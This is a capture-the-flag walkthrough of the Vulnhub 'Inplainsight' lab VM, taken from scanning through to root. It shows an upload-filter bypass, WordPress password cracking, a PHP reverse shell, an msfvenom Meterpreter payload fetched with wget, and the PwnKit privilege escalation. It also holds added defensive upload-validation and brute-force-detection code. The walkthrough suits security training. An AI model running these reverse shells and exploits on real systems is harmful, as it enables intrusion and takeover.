Vulnhub Inplainsight target machine: detailed testing process and lessons learned

Inplainsight

Identifying the target host's IP address

─(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:86:38:75      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:f9:29:62      1      60  PCS Systemtechnik GmbH    

Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.254.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 20:38 EDT
Nmap scan report for kb.final (192.168.56.254)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 392d3630aaac5d1601082c5fc56717b4 (RSA)
|   256 b021a7430c928570ff57c6f937dfe5a2 (ECDSA)
|_  256 7399d582878c0abc3d1e8daab169aa35 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:F9:29:62 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds

The NMAP scan results show that the target host has 3 open ports: 21 (ftp), 22 (ssh) and 80 (http).

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 IPS Corp
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||47934|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 ..
-rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
226 Directory send OK.
ftp> get todo.txt
local: todo.txt remote: todo.txt
229 Entering Extended Passive Mode (|||24332|)
150 Opening BINARY mode data connection for todo.txt (306 bytes).
100% |********************************************************************************|   306      410.47 KiB/s    00:00 ETA
226 Transfer complete.
306 bytes received in 00:00 (260.98 KiB/s)

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat todo.txt      
mike - please get ride of that worthless wordpress instance! it's a security ris
k.  if you have privilege issues, please ask joe for assitance.

joe - stop leaving backdoors on the system or your access will be removed! y
our rabiit holes aren't enough for these elite cyber hacking types.

- boss person

  1. Users: mike, joe

  2. There may be a backdoor file

  3. Is the target site WordPress?

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,js,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/04/15 20:56:47 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/info.php             (Status: 200) [Size: 84027]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.254/wordpress/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1319837 / 1323366 (99.73%)===============================================================
2023/04/15 20:59:29 Finished
==========================================================

Gobuster identifies the /wordpress directory. Visiting it, the page renders incompletely; the page source shows that a hostname has to be added to /etc/hosts: inplainsight

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  inplainsight

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -e u,p                                        
________________________________________________________
[i] User(s) Identified:

[+] bossperson
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


wpscan identifies the username bossperson; next, see whether its password can be cracked.

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -U bossperson -P /usr/share/wordlists/rockyou.txt 

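After running for 15 minutes the password had still not been cracked, so this direction is set aside for now.

Next, see whether a scan turns up any vulnerable plugins.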

(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ --plugins-detection mixed

No vulnerable plugins were identified.

Back on the default page, note this text:



This is the default welcome page used to test the correct operation of the Apache2 server after installation on Ubuntu systems. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is derived. If you can read this page, it means that the Apache HTTP server installed at this site is working properly. You should replace this file (located at /var/www/html/index.htnl) before continuing to operate your HTTP server.

If you are a normal user of this web site and don't know what this page is about, this probably means that the site is currently unavailable due to maintenance. If the problem persists, please contact the site's administrator.

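The text refers to a file /var/www/html/index.htnl

The extension is odd, so visit that page.

It contains an animated image; clicking it redirects to another page where files can be uploaded.

But when shell.php is uploaded, an error is returned: File is not an image.

Intercept the request with Burp Suite and see whether the check can be bypassed by changing the content type.

Changing the content type to image/jpeg in Burp Suite did not work.

Next, a line is added at the top of shell.php: GIF89a

The response is now: File is an image - image/gif. The page source also contains a comment at this point: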


<!--c28tZGV2LXdvcmRwcmVzcw==-->
</body></html>

Decode it:

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ echo 'c28tZGV2LXdvcmRwcmVzcw==' | base64 -d                  
so-dev-wordpress     
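The upload check above accepted a script once it began with GIF89a. The following is an added example, not code from the target or from the original post, contrasting a magic-byte-only check with a stricter one; the function names, the GIF-only allowlist and both sample byte strings are assumptions constructed for illustration.

```python
import secrets
import struct
from pathlib import PurePosixPath

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")
ALLOWED_EXTENSIONS = {".gif"}  # assumption: this endpoint only needs GIF uploads

# Constructed samples, not taken from the target.
SCRIPT_WITH_GIF_PREFIX = b"GIF89a\n<?php echo 'placeholder'; ?>\n"
TINY_GIF = bytes.fromhex(
    "474946383961 0100 0100 80 00 00"      # signature, 1x1 screen, flags, bg, aspect
    "000000 ffffff"                        # two-entry global colour table
    "21f9040100000000"                     # graphic control extension
    "2c00000000010001000002024401003b"     # image descriptor, pixel data, trailer
)


def weak_is_image(data: bytes) -> bool:
    """Magic-byte sniffing only, modelling the behaviour seen in the walkthrough."""
    return data[:6] in GIF_SIGNATURES


def gif_structure_ok(data: bytes) -> bool:
    """Check the fixed GIF layout instead of trusting the first six bytes."""
    if len(data) < 14 or data[:6] not in GIF_SIGNATURES:
        return False
    width, height, flags = struct.unpack_from("<HHB", data, 6)
    if width == 0 or height == 0:
        return False
    pos = 13  # 6-byte signature + 7-byte logical screen descriptor
    if flags & 0x80:  # global colour table present
        pos += 3 * (2 ** ((flags & 0x07) + 1))
    # The next byte must introduce an extension (0x21), an image (0x2C) or the
    # trailer (0x3B), and the stream must end with the trailer.
    return pos < len(data) and data[pos] in (0x21, 0x2C, 0x3B) and data[-1] == 0x3B


def accept_upload(client_name: str, data: bytes):
    """Return a server-chosen storage name, or None when the upload is rejected."""
    ext = PurePosixPath(client_name.replace("\\", "/")).suffix.lower()
    if ext not in ALLOWED_EXTENSIONS:  # shell.php stops here whatever its bytes say
        return None
    if not gif_structure_ok(data):
        return None
    # A structure check cannot rule out every crafted file, so the stored name
    # is generated here with a fixed, non-executable extension and the client's
    # name is never reused.
    return secrets.token_hex(16) + ".gif"


if __name__ == "__main__":
    print("weak check accepts script:", weak_is_image(SCRIPT_WITH_GIF_PREFIX))
    print("strict, shell.php:", accept_upload("shell.php", SCRIPT_WITH_GIF_PREFIX))
    print("strict, shell.gif:", accept_upload("shell.gif", SCRIPT_WITH_GIF_PREFIX))
    print("strict, logo.gif :", accept_upload("logo.gif", TINY_GIF))
```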

The decoded string so-dev-wordpress should be another directory, which also matches the description in the todo file, so scan so-dev-wordpress:

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -e u,p
[i] User(s) Identified:

[+] mike
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

    
(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U mike -P /usr/share/wordlists/rockyou.txt

After running for 15 minutes the password was not cracked.

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress --plugins-detection mixed  

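wpscan did not find any vulnerable plugins here either.

So try cracking the password of the other user, admin. Just when it looked hopeless, the password came back after 5 minutes of running: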

─(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U admin -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
 | Username: admin, Password: admin1

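Only after logging in with admin:admin1 did it become clear that mike is an ordinary user and admin is the administrator. In many cases the first user that wpscan identifies is the administrator, but that is not the case on this target.

Replace the 404 template in the theme editor with shell.php, then visit the 404.php file to get a shell.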
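The wpscan runs above (author-ID enumeration followed by password guessing against one account) leave a recognisable pattern in the web server's access log. The following is an added detection example, not part of the original post; the log lines are constructed in Apache combined-log style, and the thresholds, the 60-second window and the client 192.168.56.10 are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"'
)
LOGIN_PATHS = ("wp-login.php", "xmlrpc.php")  # endpoints that accept credentials
AUTHOR_ENUM = re.compile(r"[?&]author=(\d+)")

# Constructed sample log: one noisy source and one ordinary login.
SAMPLE = [
    f'192.168.56.206 - - [15/Apr/2023:21:10:{s:02d} -0400] '
    f'"GET /so-dev-wordpress/?author={s} HTTP/1.1" 301 0'
    for s in range(1, 5)
] + [
    f'192.168.56.206 - - [15/Apr/2023:21:11:{s:02d} -0400] '
    f'"POST /so-dev-wordpress/wp-login.php HTTP/1.1" 200 4100'
    for s in range(0, 40, 2)
] + [
    '192.168.56.10 - - [15/Apr/2023:21:11:05 -0400] '
    '"POST /so-dev-wordpress/wp-login.php HTTP/1.1" 302 0',
    '192.168.56.10 - - [15/Apr/2023:21:11:09 -0400] '
    '"GET /so-dev-wordpress/wp-admin/ HTTP/1.1" 200 9000',
]


def detect(lines, window=timedelta(seconds=60), login_threshold=5, enum_threshold=3):
    """Return sorted (ip, finding, count) tuples for enumeration and guessing."""
    logins = defaultdict(list)    # ip -> timestamps of credential POSTs
    author_ids = defaultdict(set)  # ip -> distinct ?author=N values requested
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"]
        enum = AUTHOR_ENUM.search(path)
        if m["method"] == "POST" and path.split("?", 1)[0].endswith(LOGIN_PATHS):
            logins[m["ip"]].append(ts)
        elif m["method"] == "GET" and enum:
            author_ids[m["ip"]].add(enum.group(1))

    alerts = []
    for ip, ids in author_ids.items():
        if len(ids) >= enum_threshold:
            alerts.append((ip, "author-id enumeration", len(ids)))
    for ip, stamps in logins.items():
        stamps.sort()
        best, lo = 0, 0
        for hi, stamp in enumerate(stamps):  # sliding window over sorted times
            while stamp - stamps[lo] > window:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= login_threshold:
            alerts.append((ip, "login brute force", best))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```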

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 54968
Linux inplainsight 5.3.0-23-generic #25-Ubuntu SMP Tue Nov 12 09:22:33 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 22:30:48 up  1:58,  0 users,  load average: 0.03, 1.09, 1.87
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@inplainsight:/$ cd /home
cd /home
www-data@inplainsight:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
www-data@inplainsight:/home$ cd joe
cd joe
www-data@inplainsight:/home/joe$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 joe  joe  4.0K Nov 22  2019 .
drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r-- 1 joe  joe   220 May  5  2019 .bash_logout
-rw-r--r-- 1 joe  joe  3.7K May  5  2019 .bashrc
drwx------ 2 joe  joe  4.0K Nov 21  2019 .cache
drwx------ 3 joe  joe  4.0K Nov 21  2019 .gnupg
-rw-r--r-- 1 joe  joe   807 May  5  2019 .profile
-rw-rw---- 1 joe  joe    76 Nov 22  2019 journal
www-data@inplainsight:/home/joe$ cd ..
cd ..
www-data@inplainsight:/home$ ls -lah
ls -lah
total 16K
drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
www-data@inplainsight:/home$ cd mike
cd mike
www-data@inplainsight:/home/mike$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 mike mike 4.0K Nov 22  2019 .
drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike  220 Nov 21  2019 .bash_logout
-rw-r--r-- 1 mike mike 3.7K Nov 21  2019 .bashrc
drwx------ 2 mike mike 4.0K Nov 21  2019 .cache
drwx------ 3 mike mike 4.0K Nov 21  2019 .gnupg
-rw-r--r-- 1 mike mike  807 Nov 21  2019 .profile

Privilege escalation

www-data@inplainsight:/var/www/html/so-dev-wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sodevwp' );

/** MySQL database username */
define( 'DB_USER', 'sodevwp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'oZ2R3c2x7dLL6#hJ' );


Next, see whether a Meterpreter session can be obtained.

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

Upload escalate.elf to the /tmp directory on the target host, change its permissions and execute it (with msfconsole started on Kali Linux at the same time).

www-data@inplainsight:/tmp$ wget http://192.168.56.206:8000/escalate.elf
wget http://192.168.56.206:8000/escalate.elf
--2023-04-15 22:40:41--  http://192.168.56.206:8000/escalate.elf
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘escalate.elf’

escalate.elf        100%[===================>]     207  --.-KB/s    in 0s      

2023-04-15 22:40:41 (80.0 MB/s) - ‘escalate.elf’ saved [207/207]

www-data@inplainsight:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
www-data@inplainsight:/tmp$ ./escalate.elf
./escalate.elf

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.206:6666 
[*] Sending stage (1017704 bytes) to 192.168.56.254
[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.254:50464) at 2023-04-15 22:40:54 -0400

Run the Linux suggester to look for vulnerabilities that can be used for local privilege escalation.

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.254 - Collecting local exploits for x86/linux...
[*] 192.168.56.254 - 181 exploit checks are being tried...
[+] 192.168.56.254 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.254 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.254 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.254 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 56 / 56
[*] 192.168.56.254 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/netfilter_priv_esc_ipv4                        Yes                      The target appears to be vulnerable.                                                                                                                       
 3   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.                                                                          
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.206:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.sfhgqnd
[+] The target is vulnerable.
[*] Writing '/tmp/.dmjtawxsqqdj/gfrhamboy/gfrhamboy.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.dmjtawxsqqdj
[*] Sending stage (3045348 bytes) to 192.168.56.254
[+] Deleted /tmp/.dmjtawxsqqdj/gfrhamboy/gfrhamboy.so
[+] Deleted /tmp/.dmjtawxsqqdj/.eorecnkoiqu
[+] Deleted /tmp/.dmjtawxsqqdj
[*] Meterpreter session 2 opened (192.168.56.206:8888 -> 192.168.56.254:52522) at 2023-04-15 22:45:20 -0400
meterpreter > shell
Process 2293 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 48K
drwx------  5 root root 4.0K Dec  2  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx  1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Aug 27  2019 .bashrc
drwx------  2 root root 4.0K Nov 21  2019 .cache
drwx------  3 root root 4.0K Nov 21  2019 .gnupg
-rw-------  1 root root  472 Nov 21  2019 .mysql_history
-rw-r--r--  1 root root  148 Aug 27  2019 .profile
drwxr-xr-x  2 root root 4.0K Nov 22  2019 .vim
-rw-------  1 root root  11K Dec  2  2019 .viminfo
-rw-r--r--  1 root root  408 Nov 22  2019 flag.txt
cat flag.txt

                                          __          
  ____  ____   ____    ________________ _/  |_  ______
_/ ___\/  _ \ /    \  / ___\_  __ \__  \\   __\/  ___/
\  \__(  <_> )   |  \/ /_/  >  | \// __ \|  |  \___ \ 
 \___  >____/|___|  /\___  /|__|  (____  /__| /____  >
     \/           \//_____/            \/          \/ 

easy right? thanks for playing.

feel free to leave feedback with me @bzyo_


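Privilege escalation succeeded and the root flag was obtained.

Lessons learned

  1. When cracking user passwords on the so-dev-wp WordPress site, I followed the usual pattern that the first user wpscan identifies is the administrator, and so concentrated on cracking the password of the first username, mike. Fortunately, cracking the second user, admin, did not take long.

  2. The first breakthrough on this target is the unusual file name on the default page. When visiting that file, remember to click the image, otherwise the whole way into the machine is missed.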
